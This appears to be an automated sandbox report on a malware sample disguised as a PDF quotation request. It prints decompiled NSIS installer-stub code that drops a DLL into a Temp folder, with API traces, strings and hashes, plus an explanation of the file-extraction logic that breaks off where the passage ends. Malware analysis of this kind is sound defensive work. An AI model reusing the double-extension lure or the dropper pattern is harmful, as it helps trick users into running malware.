                                                                        • Opcode Fuzzy Hash: dec3fbaa8690636eaa49f40ab7a36df9d34a383e5316d53f08f1eda561668ae6
                                                                        • Instruction Fuzzy Hash: 19210B31D04321EBCB216F659E8C95F7A70AF95315B20413BF712B62D1C7BC4A82DA9E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00405C94(CHAR* _a4) {
                                                                        				void* _t3;
                                                                        				void* _t8;
                                                                        
                                                                        				SetErrorMode(0x8001); // executed
                                                                        				_t3 = FindFirstFileA(_a4, 0x7a15d0); // executed
                                                                        				_t8 = _t3; // executed
                                                                        				SetErrorMode(0); // executed
                                                                        				if(_t8 == 0xffffffff) {
                                                                        					return 0;
                                                                        				}
                                                                        				FindClose(_t8); // executed
                                                                        				return 0x7a15d0;
                                                                        			}


                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE(00008001,00000000,007A0988,C:\Users\user\AppData\Local\Temp\,004055EF,007A0988,007A0988,00000000,007A0988,007A0988,?,?,00000000,00405315,?,"C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe" ), ref: 00405CA2
                                                                        • FindFirstFileA.KERNELBASE(?,007A15D0), ref: 00405CAE
                                                                        • SetErrorMode.KERNELBASE(00000000), ref: 00405CB8
                                                                        • FindClose.KERNELBASE(00000000), ref: 00405CC0
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C94
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: ErrorFindMode$CloseFileFirst
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                        • API String ID: 2885216544-3081826266
                                                                        • Opcode ID: 2793f7a1020c472c0b2cc591d231d4d262c91262e7ffd9c0c44dd2ab926118f0
                                                                        • Instruction ID: 58bb4516a74dc5dde44cdc206f1ac441c4a30f5218be24d725a78a1f01f55fab
                                                                        • Opcode Fuzzy Hash: 2793f7a1020c472c0b2cc591d231d4d262c91262e7ffd9c0c44dd2ab926118f0
                                                                        • Instruction Fuzzy Hash: 6AE08632B1971057D20057B45D88D0B3AA8D7C5721F100132F211B73D0D5755C114BE5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 89%
E00403526() {
	intOrPtr _v4;
	intOrPtr _v8;
	int _v12;
	int _v16;
	char _v20;
	void* __ebx;
	void* __edi;
	void* __esi;
	intOrPtr* _t20;
	void* _t28;
	void* _t30;
	int _t31;
	void* _t34;
	struct HINSTANCE__* _t37;
	int _t38;
	int _t42;
	char _t61;
	CHAR* _t63;
	signed char _t67;
	CHAR* _t78;
	intOrPtr _t80;
	CHAR* _t82;
	CHAR* _t84;
	CHAR* _t85;

	_t80 =  *0x7a2f88;
	_t20 = E00405CD2("KERNEL32.dll", "GetUserDefaultUILanguage");
	_t88 = _t20;
	if(_t20 == 0) {
		_t78 = 0x79f580;
		"1033" = 0x7830;
		E004058B3(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x79f580);
		__eflags =  *0x79f580;
		if(__eflags == 0) {
			E004058B3(0x80000003, ".DEFAULT\\Control Panel\\International", "Locale", 0x79f580);
		}
		lstrcatA("1033", _t78);
	} else {
		E0040591D("1033",  *_t20() & 0x0000ffff);
	}
	E004037F2(_t75, _t88);
	_t84 = "C:\\Users\\jones\\AppData\\Local\\Temp";
	 *0x7a3000 =  *0x7a2f90 & 0x00000020;
	if(E004055AC(_t88, _t84) != 0) {
		L16:
		if(E004055AC(_t96, _t84) == 0) {
			_push( *((intOrPtr*)(_t80 + 0x118)));
			_push(_t84);
			E004059E1(0, _t78, _t80);
		}
		_t28 = LoadImageA( *0x7a2f80, 0x67, 1, 0, 0, 0x8040); // executed
		 *0x7a2768 = _t28;
		if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
			L21:
			if(E00401410(0) == 0) {
				_t30 = E004037F2(_t75, __eflags);
				__eflags =  *0x7a3020;
				if( *0x7a3020 != 0) {
					_t31 = E00404E34(_t30, 0);
					__eflags = _t31;
					if(_t31 == 0) {
						E00401410(1);
						goto L33;
					}
					__eflags =  *0x7a274c;
					if( *0x7a274c == 0) {
						E00401410(2);
					}
					goto L22;
				}
				ShowWindow( *0x79f560, 5);
				_t85 = "RichEd20.dll";
				_t37 = LoadLibraryA(_t85);
				__eflags = _t37;
				if(_t37 == 0) {
					M004092B6 = 0x3233;
					LoadLibraryA(_t85);
				}
				_t82 = "RichEdit20A";
				_t38 = GetClassInfoA(0, _t82, 0x7a2720);
				__eflags = _t38;
				if(_t38 == 0) {
					 *0x4092ac = 0;
					GetClassInfoA(0, _t82, 0x7a2720);
					 *0x7a2744 = _t82;
					 *0x4092ac = 0x32;
					RegisterClassA(0x7a2720);
				}
				_t42 = DialogBoxParamA( *0x7a2f80,  *0x7a2760 + 0x00000069 & 0x0000ffff, 0, E004038BF, 0);
				E00401410(5);
				return _t42;
			}
			L22:
			_t34 = 2;
			return _t34;
		} else {
			_t75 =  *0x7a2f80;
			 *0x7a2734 = _t28;
			_v20 = 0x624e5f;
			 *0x7a2724 = E00401000;
			 *0x7a2730 =  *0x7a2f80;
			 *0x7a2744 =  &_v20;
			if(RegisterClassA(0x7a2720) == 0) {
				L33:
				__eflags = 0;
				return 0;
			}
			_t12 =  &_v16; // 0x624e5f
			SystemParametersInfoA(0x30, 0, _t12, 0);
			 *0x79f560 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7a2f80, 0);
			goto L21;
		}
	} else {
		_t75 =  *(_t80 + 0x48);
		if(_t75 == 0) {
			goto L16;
		}
		_t78 = 0x7a1f20;
		E004058B3( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) +  *0x7a2fb8, 0x7a1f20);
		_t61 =  *0x7a1f20; // 0x49
		if(_t61 == 0) {
			goto L16;
		}
		if(_t61 == 0x22) {
			_t78 = 0x7a1f21;
			 *((char*)(E004054F7(0x7a1f21, 0x22))) = 0;
		}
		_t63 = lstrlenA(_t78) + _t78 - 4;
		if(_t63 <= _t78 || lstrcmpiA(_t63, ".exe") != 0) {
			L15:
			E004059BF(_t84, E004054CC(_t78));
			goto L16;
		} else {
			_t67 = GetFileAttributesA(_t78);
			if(_t67 == 0xffffffff) {
				L14:
				E00405513(_t78);
				goto L15;
			}
			_t96 = _t67 & 0x00000010;
			if((_t67 & 0x00000010) != 0) {
				goto L15;
			}
			goto L14;
		}
	}
}

Instruction addresses (decompiler side column for the function above, in source order):
0x0040352c 0x0040353d 0x00403544 0x00403546 0x0040355a 0x0040355f 0x00403575 0x0040357a 0x00403580 0x00403592
0x00403592 0x0040359d 0x00403548 0x00403553 0x00403553 0x004035a2 0x004035ac 0x004035b5 0x004035c1 0x00403647
0x0040364f 0x00403651 0x00403657 0x00403658 0x00403658 0x0040366e 0x00403674 0x00403682 0x00403711 0x00403719
0x00403723 0x00403728 0x0040372e 0x004037c0 0x004037c5 0x004037c7 0x004037e3 0x00000000 0x004037e3 0x004037c9
0x004037cf 0x004037d7 0x004037d7 0x00000000 0x004037cf 0x0040373c 0x00403748 0x0040374e 0x00403750 0x00403752
0x00403755 0x0040375e 0x0040375e 0x00403766 0x0040376e 0x00403770 0x00403772 0x00403777 0x0040377d 0x00403780
0x00403786 0x0040378d 0x0040378d 0x004037ac 0x004037b6 0x00000000 0x004037bb 0x0040371b 0x0040371d 0x00000000
0x00403688 0x00403688 0x0040368e 0x00403698 0x004036a0 0x004036aa 0x004036b0 0x004036be 0x004037e8 0x004037e8
0x00000000 0x004037e8 0x004036c4 0x004036cd 0x0040370c 0x00000000 0x0040370c 0x004035c7 0x004035c7 0x004035cc
0x00000000 0x00000000 0x004035d6 0x004035e5 0x004035ea 0x004035f1 0x00000000 0x00000000 0x004035f5 0x004035f7
0x00403604 0x00403604 0x0040360c 0x00403612 0x0040363a 0x00403642 0x00000000 0x00403624 0x00403625 0x0040362e
0x00403634 0x00403635 0x00000000 0x00403635 0x00403630 0x00403632 0x00000000 0x00000000 0x00000000 0x00403632
0x00403612

APIs
  • Part of subcall function 00405CD2: GetModuleHandleA.KERNEL32(000000F1,0040571A,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CD6
  • Part of subcall function 00405CD2: LoadLibraryA.KERNEL32(000000F1,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CE4
  • Part of subcall function 00405CD2: GetProcAddress.KERNEL32(00000000,00000000), ref: 00405CF3
• lstrcatA.KERNEL32(1033,0079F580,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F580,KERNEL32.dll,GetUserDefaultUILanguage,"C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe" ,00000000,00000000,C:\Users\user\AppData\Local\Temp\,00000020), ref: 0040359D
• lstrlenA.KERNEL32(007A1F20,?,?,?,007A1F20,C:\Users\user\AppData\Local\Temp,1033,0079F580,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F580,KERNEL32.dll,GetUserDefaultUILanguage,"C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe" ,00000000), ref: 00403607
• lstrcmpiA.KERNEL32(?,.exe,007A1F20,?,?,?,007A1F20,C:\Users\user\AppData\Local\Temp,1033,0079F580,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F580,KERNEL32.dll,GetUserDefaultUILanguage), ref: 0040361A
• GetFileAttributesA.KERNEL32(007A1F20), ref: 00403625
• LoadImageA.USER32 ref: 0040366E
• RegisterClassA.USER32 ref: 004036B5
  • Part of subcall function 0040591D: wsprintfA.USER32 ref: 0040592A
• SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004036CD
• CreateWindowExA.USER32 ref: 00403706
• ShowWindow.USER32(00000005,00000000), ref: 0040373C
• LoadLibraryA.KERNEL32(RichEd20.dll), ref: 0040374E
• LoadLibraryA.KERNEL32(RichEd20.dll), ref: 0040375E
• GetClassInfoA.USER32 ref: 0040376E
• GetClassInfoA.USER32 ref: 0040377D
• RegisterClassA.USER32 ref: 0040378D
• DialogBoxParamA.USER32 ref: 004037AC
Strings
Memory Dump Source
• Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp
• Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp
• Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp
• Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp
• Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp
• Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp
• Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp
• Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp
• Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp
Similarity
• API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
• String ID: 'z$"C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$KERNEL32.dll$Locale$RichEd20.dll$RichEdit20A$_Nb
• API String ID: 914957316-1414530842
• Opcode ID: 3309331118697da18f1ff15fefd605bdcd3012e4522bb3cb26734b4951d889a7
• Instruction ID: 4e9c7f181e94f196de7c88ece58cce9fa533c44585b571451200f5668265d8f3
• Opcode Fuzzy Hash: 3309331118697da18f1ff15fefd605bdcd3012e4522bb3cb26734b4951d889a7
• Instruction Fuzzy Hash: 5361C2B1504240BFE720AF699D45E2B3AACEB85759B00457FF941B22E2D73D9D018B2E
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 79%
                                                                        			E00402C37(void* __eflags, signed int _a4) {
                                                                        				struct HWND__* _v8;
                                                                        				char _v12;
                                                                        				long _v16;
                                                                        				void* _v20;
                                                                        				intOrPtr _v24;
                                                                        				long _v28;
                                                                        				intOrPtr _v32;
                                                                        				intOrPtr _v36;
                                                                        				intOrPtr _v40;
                                                                        				intOrPtr _v44;
                                                                        				signed int _v48;
                                                                        				long _t52;
                                                                        				long _t56;
                                                                        				void* _t58;
                                                                        				void* _t62;
                                                                        				intOrPtr* _t66;
                                                                        				long _t67;
                                                                        				long _t78;
                                                                        				void* _t79;
                                                                        				intOrPtr _t89;
                                                                        				void* _t91;
                                                                        				long _t92;
                                                                        				void* _t93;
                                                                        				signed int _t94;
                                                                        				signed int _t95;
                                                                        				void* _t97;
                                                                        				long _t101;
                                                                        				void* _t102;
                                                                        
                                                                        				_v8 = 0;
                                                                        				_t52 = GetTickCount();
                                                                        				_v16 = 0;
                                                                        				_v12 = 0;
                                                                        				_t100 = "C:\\Users\\jones\\Desktop";
                                                                        				_t97 = _t52 + 0x3e8;
                                                                        				GetModuleFileNameA( *0x7a2f80, "C:\\Users\\jones\\Desktop", 0x400);
                                                                        				_t91 = E00405690(_t100, 0x80000000, 3);
                                                                        				_v20 = _t91;
                                                                        				 *0x409020 = _t91;
                                                                        				if(_t91 == 0xffffffff) {
                                                                        					return "Error launching installer";
                                                                        				}
                                                                        				E00405513(_t100);
                                                                        				_t56 = GetFileSize(_t91, 0);
                                                                        				 *0x79d938 = _t56;
                                                                        				_t101 = _t56;
                                                                        				if(_t56 <= 0) {
                                                                        					L27:
                                                                        					if( *0x7a2f8c == 0) {
                                                                        						goto L33;
                                                                        					}
                                                                        					if(_v12 == 0) {
                                                                        						L31:
                                                                        						_t58 = GlobalAlloc(0x40, _v28); // executed
                                                                        						_t102 = _t58;
                                                                        						E004030FF( *0x7a2f8c + 0x1c);
                                                                        						_push(_v28);
                                                                        						_push(_t102);
                                                                        						_push(0);
                                                                        						_push(0xffffffff); // executed
                                                                        						_t62 = E00402EBD(); // executed
                                                                        						if(_t62 == _v28) {
                                                                        							 *0x7a2f88 = _t102;
                                                                        							if((_a4 & 0x00000002) != 0) {
                                                                        								 *_t102 =  *_t102 | 0x00000008;
                                                                        							}
                                                                        							 *0x7a3020 =  *_t102 & 0x00000018;
                                                                        							 *0x7a2f90 =  *_t102;
                                                                        							if((_v48 & 0x00000001) != 0) {
                                                                        								 *0x7a2f94 =  *0x7a2f94 + 1;
                                                                        							}
                                                                        							_t49 = _t102 + 0x44; // 0x44
                                                                        							_t66 = _t49;
                                                                        							_t93 = 8;
                                                                        							do {
                                                                        								_t66 = _t66 - 8;
                                                                        								 *_t66 =  *_t66 + _t102;
                                                                        								_t93 = _t93 - 1;
                                                                        							} while (_t93 != 0);
                                                                        							_t67 = SetFilePointer(_v20, 0, 0, 1); // executed
                                                                        							 *(_t102 + 0x3c) = _t67;
                                                                        							E00405670(0x7a2fa0, _t102 + 4, 0x40);
                                                                        							return 0;
                                                                        						}
                                                                        						GlobalFree(_t102);
                                                                        						goto L33;
                                                                        					}
                                                                        					E004030FF( *0x789930);
                                                                        					if(E004030CD( &_v12, 4) == 0 || _v16 != _v12) {
                                                                        						goto L33;
                                                                        					} else {
                                                                        						goto L31;
                                                                        					}
                                                                        				} else {
                                                                        					do {
                                                                        						_t92 = _t101;
                                                                        						asm("sbb eax, eax");
                                                                        						_t78 = ( ~( *0x7a2f8c) & 0x00007e00) + 0x200;
                                                                        						if(_t101 >= _t78) {
                                                                        							_t92 = _t78;
                                                                        						}
                                                                        						_t79 = E004030CD(0x795938, _t92); // executed
                                                                        						if(_t79 == 0) {
                                                                        							if(_v8 != 0) {
                                                                        								DestroyWindow(_v8);
                                                                        							}
                                                                        							L33:
                                                                        							return "The installer you are trying to use is corrupted or incomplete.\nThis could be the result of a damaged disk, a failed download or a virus.\n\nYou may want to contact the author of this installer to obtain a new copy.\n\nIt may be possible to skip this check using the /NCRC command line switch\n(NOT RECOMMENDED).";
                                                                        						}
                                                                        						if( *0x7a2f8c != 0) {
                                                                        							if((_a4 & 0x00000002) == 0) {
                                                                        								if(_v8 == 0) {
                                                                        									if(GetTickCount() > _t97) {
                                                                        										_v8 = CreateDialogParamA( *0x7a2f80, 0x6f, 0, E00402BAB, "verifying installer: %d%%");
                                                                        									}
                                                                        								} else {
                                                                        									E00405CFC(0);
                                                                        								}
                                                                        							}
                                                                        							goto L22;
                                                                        						}
                                                                        						E00405670( &_v48, 0x795938, 0x1c);
                                                                        						_t94 = _v48;
                                                                        						if((_t94 & 0xfffffff0) == 0 && _v44 == 0xdeadbeef && _v32 == 0x74736e49 && _v36 == 0x74666f73 && _v40 == 0x6c6c754e) {
                                                                        							_t89 = _v24;
                                                                        							if(_t89 > _t101) {
                                                                        								goto L33;
                                                                        							}
                                                                        							_a4 = _a4 | _t94;
                                                                        							_t95 =  *0x789930; // 0x36600
                                                                        							 *0x7a2f8c = _t95;
                                                                        							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
                                                                        								_v12 = _v12 + 1;
                                                                        								_t24 = _t89 - 4; // 0x1c
                                                                        								_t101 = _t24;
                                                                        								if(_t92 > _t101) {
                                                                        									_t92 = _t101;
                                                                        								}
                                                                        								goto L22;
                                                                        							} else {
                                                                        								break;
                                                                        							}
                                                                        						}
                                                                        						L22:
                                                                        						if(_t101 <  *0x79d938) {
                                                                        							_v16 = E00405D2F(_v16, 0x795938, _t92);
                                                                        						}
                                                                        						 *0x789930 =  *0x789930 + _t92;
                                                                        						_t101 = _t101 - _t92;
                                                                        					} while (_t101 > 0);
                                                                        					if(_v8 != 0) {
                                                                        						DestroyWindow(_v8);
                                                                        					}
                                                                        					goto L27;
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        • GetTickCount.KERNEL32 ref: 00402C45
                                                                        • GetModuleFileNameA.KERNEL32(C:\Users\user\Desktop,00000400,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402C6A
                                                                          • Part of subcall function 00405690: GetFileAttributesA.KERNELBASE(00000003,00402C7D,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405694
                                                                          • Part of subcall function 00405690: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 004056B6
                                                                        • GetFileSize.KERNEL32(00000000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402CA0
                                                                        • DestroyWindow.USER32(00000000,00795938,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402DD8
                                                                        • GlobalAlloc.KERNELBASE(00000040,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402E14
                                                                        Strings
                                                                        • Inst, xrefs: 00402D19
                                                                        • Null, xrefs: 00402D2F
                                                                        • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402C37
                                                                        • soft, xrefs: 00402D26
                                                                        • Error launching installer, xrefs: 00402C8D
                                                                        • C:\Users\user\Desktop, xrefs: 00402C51, 00402C5B, 00402C77, 00402C97
                                                                        • verifying installer: %d%%, xrefs: 00402D89
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C3D
                                                                        • The installer you are trying to use is corrupted or incomplete.This could be the result of a damaged disk, a failed download or a virus.You may want to contact the author of this installer to obtain a new copy.It may be possible to skip this check using t, xrefs: 00402E42
                                                                        • "C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe" , xrefs: 00402C41
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: File$AllocAttributesCountCreateDestroyGlobalModuleNameSizeTickWindow
                                                                        • String ID: "C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Null$The installer you are trying to use is corrupted or incomplete.This could be the result of a damaged disk, a failed download or a virus.You may want to contact the author of this installer to obtain a new copy.It may be possible to skip this check using t$soft$verifying installer: %d%%
                                                                        • API String ID: 2181728824-1438877197
                                                                        • Opcode ID: 070d32362b5f02bfa4bcb615afc2903e7a1d408c6553ea38cbd2013ea11f58e9
                                                                        • Instruction ID: 2bc3342fd27a022da09e110317cf5b670322b105189d6b48e3606e9cef6b214d
                                                                        • Opcode Fuzzy Hash: 070d32362b5f02bfa4bcb615afc2903e7a1d408c6553ea38cbd2013ea11f58e9
                                                                        • Instruction Fuzzy Hash: 8561CE30900215EBDB219F64DE49B9EBBB4BF45714F20813AF900B22E2D7BC9D418B9C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 57%
                                                                        			E0040179D(FILETIME* __ebx, void* __eflags) {
                                                                        				void* _t33;
                                                                        				void* _t41;
                                                                        				void* _t43;
                                                                        				long _t49;
                                                                        				long _t62;
                                                                        				signed char _t63;
                                                                        				long _t64;
                                                                        				void* _t66;
                                                                        				long _t72;
                                                                        				FILETIME* _t73;
                                                                        				FILETIME* _t77;
                                                                        				signed int _t79;
                                                                        				void* _t82;
                                                                        				CHAR* _t84;
                                                                        				void* _t87;
                                                                        
                                                                        				_t77 = __ebx;
                                                                        				_t84 = E00402A9A(0x31);
                                                                        				 *(_t87 - 0x34) = _t84;
                                                                        				 *(_t87 + 8) =  *(_t87 - 0x24) & 0x00000007;
                                                                        				_t33 = E00405538(_t84);
                                                                        				_push(_t84);
                                                                        				if(_t33 == 0) {
                                                                        					lstrcatA(E004054CC(E004059BF(0x409c18, "C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
                                                                        				} else {
                                                                        					_push(0x409c18);
                                                                        					E004059BF();
                                                                        				}
                                                                        				E00405BFB(0x409c18);
                                                                        				while(1) {
                                                                        					__eflags =  *(_t87 + 8) - 3;
                                                                        					if( *(_t87 + 8) >= 3) {
                                                                        						_t66 = E00405C94(0x409c18);
                                                                        						_t79 = 0;
                                                                        						__eflags = _t66 - _t77;
                                                                        						if(_t66 != _t77) {
                                                                        							_t73 = _t66 + 0x14;
                                                                        							__eflags = _t73;
                                                                        							_t79 = CompareFileTime(_t73, _t87 - 0x18);
                                                                        						}
                                                                        						asm("sbb eax, eax");
                                                                        						_t72 =  ~(( *(_t87 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                                                                        						__eflags = _t72;
                                                                        						 *(_t87 + 8) = _t72;
                                                                        					}
                                                                        					__eflags =  *(_t87 + 8) - _t77;
                                                                        					if( *(_t87 + 8) == _t77) {
                                                                        						_t63 = GetFileAttributesA(0x409c18); // executed
                                                                        						_t64 = _t63 & 0x000000fe;
                                                                        						__eflags = _t64;
                                                                        						SetFileAttributesA(0x409c18, _t64); // executed
                                                                        					}
                                                                        					__eflags =  *(_t87 + 8) - 1;
                                                                        					_t41 = E00405690(0x409c18, 0x40000000, (0 |  *(_t87 + 8) != 0x00000001) + 1);
                                                                        					__eflags = _t41 - 0xffffffff;
                                                                        					 *(_t87 - 8) = _t41;
                                                                        					if(_t41 != 0xffffffff) {
                                                                        						break;
                                                                        					}
                                                                        					__eflags =  *(_t87 + 8) - _t77;
                                                                        					if( *(_t87 + 8) != _t77) {
                                                                        						E00404D62(0xffffffe2,  *(_t87 - 0x34));
                                                                        						__eflags =  *(_t87 + 8) - 2;
                                                                        						if(__eflags == 0) {
                                                                        							 *((intOrPtr*)(_t87 - 4)) = 1;
                                                                        						}
                                                                        						L31:
                                                                        						 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t87 - 4));
                                                                        						__eflags =  *0x7a3008;
                                                                        						goto L32;
                                                                        					} else {
                                                                        						E004059BF(0x40a418, 0x7a4000);
                                                                        						E004059BF(0x7a4000, 0x409c18);
                                                                        						E004059E1(_t77, 0x40a418, 0x409c18, "C:\Users\jones\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll",  *((intOrPtr*)(_t87 - 0x10)));
                                                                        						E004059BF(0x7a4000, 0x40a418);
                                                                        						_t62 = E004052BF("C:\Users\jones\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll",  *(_t87 - 0x24) >> 3) - 4;
                                                                        						__eflags = _t62;
                                                                        						if(_t62 == 0) {
                                                                        							continue;
                                                                        						} else {
                                                                        							__eflags = _t62 == 1;
                                                                        							if(_t62 == 1) {
                                                                        								 *0x7a3008 =  *0x7a3008 + 1;
                                                                        								L32:
                                                                        								_t49 = 0;
                                                                        								__eflags = 0;
                                                                        							} else {
                                                                        								_push(0x409c18);
                                                                        								_push(0xfffffffa);
                                                                        								E00404D62();
                                                                        								L29:
                                                                        								_t49 = 0x7fffffff;
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					L33:
                                                                        					return _t49;
                                                                        				}
                                                                        				E00404D62(0xffffffea,  *(_t87 - 0x34));
                                                                        				 *0x4092a0 =  *0x4092a0 + 1;
                                                                        				_push(_t77);
                                                                        				_push(_t77);
                                                                        				_push( *(_t87 - 8));
                                                                        				_push( *((intOrPtr*)(_t87 - 0x1c)));
                                                                        				_t43 = E00402EBD(); // executed
                                                                        				 *0x4092a0 =  *0x4092a0 - 1;
                                                                        				__eflags =  *(_t87 - 0x18) - 0xffffffff;
                                                                        				_t82 = _t43;
                                                                        				if( *(_t87 - 0x18) != 0xffffffff) {
                                                                        					L22:
                                                                        					SetFileTime( *(_t87 - 8), _t87 - 0x18, _t77, _t87 - 0x18); // executed
                                                                        				} else {
                                                                        					__eflags =  *((intOrPtr*)(_t87 - 0x14)) - 0xffffffff;
                                                                        					if( *((intOrPtr*)(_t87 - 0x14)) != 0xffffffff) {
                                                                        						goto L22;
                                                                        					}
                                                                        				}
                                                                        				FindCloseChangeNotification( *(_t87 - 8)); // executed
                                                                        				__eflags = _t82 - _t77;
                                                                        				if(_t82 >= _t77) {
                                                                        					goto L31;
                                                                        				} else {
                                                                        					__eflags = _t82 - 0xfffffffe;
                                                                        					if(_t82 != 0xfffffffe) {
                                                                        						E004059E1(_t77, _t82, 0x409c18, 0x409c18, 0xffffffee);
                                                                        					} else {
                                                                        						E004059E1(_t77, _t82, 0x409c18, 0x409c18, 0xffffffe9);
                                                                        						lstrcatA(0x409c18,  *(_t87 - 0x34));
                                                                        					}
                                                                        					_push(0x200010);
                                                                        					_push(0x409c18);
                                                                        					E004052BF();
                                                                        					goto L29;
                                                                        				}
                                                                        				goto L33;
                                                                        			}
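The listing above is the NSIS stub's file-extraction handler: the low three bits of the instruction's first parameter select the overwrite mode (`& 0x00000007`), modes 3 and up are collapsed to overwrite/skip by `CompareFileTime` against the timestamp packed with the file, unconditional overwrite first strips the read-only attribute (`attr & 0xFE`), the open uses `GENERIC_WRITE` with `CREATE_NEW` only when the mode is "off", and after writing the stub calls `SetFileTime` with the packed timestamp as both creation and last-write time. The Python below is an added model of that decision logic, written for this page; it is not code from the report or from NSIS. The mode names and the ifnewer/ifdiff semantics are taken from the NSIS `SetOverwrite` documentation (an assumption that this stub follows the documented behaviour; the exact sign trick in the decompiled expression is not reproduced), and `messagebox_flags` only records that the remaining bits are passed to the message-box routine `E004052BF`, whose interpretation the page does not show.

```python
"""Model of the overwrite policy in the NSIS File handler (E0040179D).

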